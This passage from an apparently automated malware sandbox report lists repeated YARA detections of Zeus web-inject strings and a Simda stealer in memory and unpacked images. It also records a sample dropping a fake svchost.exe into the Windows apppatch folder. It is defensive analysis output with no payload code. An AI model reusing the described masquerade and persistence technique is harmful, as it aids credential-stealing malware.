Source: 1.3.svchost.exe.3c60000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 1.3.svchost.exe.39e0000.31.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 1.3.svchost.exe.3a80000.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 1.3.svchost.exe.39e0000.43.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 1.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 1.2.svchost.exe.24c2000.3.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 1.2.svchost.exe.2d20000.5.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 1.3.svchost.exe.2601000.0.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 1.3.svchost.exe.39e0000.33.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 1.3.svchost.exe.39e0000.32.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 1.3.svchost.exe.3c60000.7.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 1.2.svchost.exe.2515c00.2.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 33.2.JbrLYfXaOpqnSngA.exe.2b40000.3.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 1.2.svchost.exe.2515c00.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 1.3.svchost.exe.39e0000.16.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 1.3.svchost.exe.39e0000.11.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 21.2.JbrLYfXaOpqnSngA.exe.c22000.1.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 1.3.svchost.exe.39e0000.35.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 21.2.JbrLYfXaOpqnSngA.exe.2440000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 27.2.JbrLYfXaOpqnSngA.exe.24e0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 6.2.JbrLYfXaOpqnSngA.exe.2440000.3.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 35.2.JbrLYfXaOpqnSngA.exe.3290000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 1.3.svchost.exe.39e0000.12.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 1.3.svchost.exe.a00000.46.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 19.2.JbrLYfXaOpqnSngA.exe.2f20000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 1.3.svchost.exe.39e0000.16.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 8.2.JbrLYfXaOpqnSngA.exe.1282000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 13.2.JbrLYfXaOpqnSngA.exe.9a2000.0.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 1.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 1.3.svchost.exe.39e0000.12.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 1.3.svchost.exe.39e0000.11.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 25.2.JbrLYfXaOpqnSngA.exe.2ab0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 1.3.svchost.exe.39e0000.43.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 1.3.svchost.exe.39e0000.30.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 1.3.svchost.exe.39e0000.17.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 1.3.svchost.exe.39e0000.14.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 1.2.svchost.exe.2d20000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 5.2.JbrLYfXaOpqnSngA.exe.2890000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 1.3.svchost.exe.39e0000.41.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000000.00000003.1654666785.0000000000868000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000001.00000003.2088018994.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000001.00000003.1663107473.0000000002601000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0000001B.00000002.2072516404.00000000024E0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000017.00000002.2056609084.0000000000C40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000006.00000002.2205687286.0000000002440000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0000001B.00000002.2072302801.0000000002340000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000008.00000002.2204407847.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000001.00000003.2056864277.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000019.00000002.2061047580.0000000002AB0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000001.00000003.2658112524.0000000000A00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000013.00000002.2052376389.0000000002F20000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000027.00000002.2089124359.0000000000E40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000001.00000003.2089951115.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0000000D.00000002.2204024511.0000000000A00000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000001.00000003.2092414435.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000001.00000003.2076160322.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000001.00000003.2100192299.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0000001F.00000002.2078765056.00000000008B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000001.00000003.2013590988.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000023.00000002.2083592694.0000000002E90000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000001.00000003.2104389897.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0000001D.00000002.2073597993.00000000032C0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000001.00000003.2657998590.0000000000A00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000001.00000003.2092245868.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000001.00000003.2049697984.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000001.00000003.2106348452.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000006.00000002.2204387165.0000000000D50000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000001.00000003.2100466451.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000001.00000003.2104185597.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000001.00000003.2086934819.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000010.00000002.2046984833.0000000002E40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000000.00000002.1658840608.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000017.00000002.2056409914.0000000000B90000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000021.00000002.2080968370.0000000002B40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000001.00000003.2107336667.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000001.00000003.2091862945.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000001.00000003.2011412007.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000021.00000002.2080530935.0000000002960000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000001.00000003.2072543768.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000001.00000003.2052599017.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000001.00000003.2086358360.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000001.00000003.2091561491.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000001.00000003.2010460715.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0000000D.00000002.2203789493.00000000009A0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000001.00000003.2025731561.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000001.00000002.2911583731.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0000001D.00000002.2072822053.0000000003010000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000015.00000002.2052668868.0000000000C20000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000025.00000002.2089692841.0000000002650000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000013.00000002.2052202062.0000000002D80000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000001.00000003.2104048966.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000001.00000003.2079645449.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000005.00000002.2204891369.0000000002890000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000001.00000002.2912354659.0000000002D83000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000005.00000002.2204103743.0000000000E40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000001.00000003.2088591684.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000010.00000002.2047246012.0000000002FE0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000027.00000002.2089771985.0000000002940000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0000001F.00000002.2078570583.0000000000850000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000001.00000003.2085749007.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000001.00000003.2107473137.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000001.00000003.2107627120.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000001.00000003.2107190009.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000001.00000002.2909940532.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000001.00000003.1664876030.0000000002570000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000001.00000003.2100321942.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000001.00000003.2064074801.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000001.00000003.2106495197.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000025.00000002.2089952227.00000000027F0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000019.00000002.2060118057.0000000001020000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000001.00000003.2046920489.0000000003A80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000001.00000003.2082103389.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000008.00000002.2204253925.0000000001280000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000001.00000003.2103873411.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000001.00000003.2060038870.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000001.00000002.2911583731.0000000002515000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000001.00000003.2086084822.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000001.00000003.2033279627.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000001.00000003.2090984983.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000015.00000002.2054528935.0000000002440000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000023.00000002.2084784998.0000000003290000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000001.00000003.2099961240.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: Bonelessness.exe PID: 6696, type: MEMORYSTR	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: svchost.exe PID: 6720, type: MEMORYSTR	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: JbrLYfXaOpqnSngA.exe PID: 6260, type: MEMORYSTR	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: JbrLYfXaOpqnSngA.exe PID: 6216, type: MEMORYSTR	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: JbrLYfXaOpqnSngA.exe PID: 3496, type: MEMORYSTR	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: JbrLYfXaOpqnSngA.exe PID: 7140, type: MEMORYSTR	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: JbrLYfXaOpqnSngA.exe PID: 7124, type: MEMORYSTR	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: JbrLYfXaOpqnSngA.exe PID: 7088, type: MEMORYSTR	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: JbrLYfXaOpqnSngA.exe PID: 7064, type: MEMORYSTR	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: JbrLYfXaOpqnSngA.exe PID: 7040, type: MEMORYSTR	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: JbrLYfXaOpqnSngA.exe PID: 7024, type: MEMORYSTR	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: JbrLYfXaOpqnSngA.exe PID: 7008, type: MEMORYSTR	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: JbrLYfXaOpqnSngA.exe PID: 6988, type: MEMORYSTR	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: JbrLYfXaOpqnSngA.exe PID: 6968, type: MEMORYSTR	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: JbrLYfXaOpqnSngA.exe PID: 6944, type: MEMORYSTR	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: JbrLYfXaOpqnSngA.exe PID: 6920, type: MEMORYSTR	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: JbrLYfXaOpqnSngA.exe PID: 6896, type: MEMORYSTR	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: JbrLYfXaOpqnSngA.exe PID: 6876, type: MEMORYSTR	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown

Yara detected Simda Stealer

Source: Yara match	File source: 0.2.Bonelessness.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.svchost.exe.2601000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.Bonelessness.exe.868460.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Bonelessness.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.1654666785.0000000000868000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.1663107473.0000000002601000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1658840608.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2909940532.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Bonelessness.exe PID: 6696, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 6720, type: MEMORYSTR

Source: C:\Users\user\Desktop\Bonelessness.exe

Code function: 0_2_004021B0: CreateFileA,DeviceIoControl,CloseHandle,

0_2_004021B0

Source: C:\Users\user\Desktop\Bonelessness.exe	File created: C:\Windows\apppatch\svchost.exe			Jump to behavior
Source: C:\Users\user\Desktop\Bonelessness.exe	File created: C:\Windows\apppatch\svchost.exe\:Zone.Identifier:$DATA			Jump to behavior

Source: C:\Users\user\Desktop\Bonelessness.exe	Code function: 0_2_004090E0	0_2_004090E0
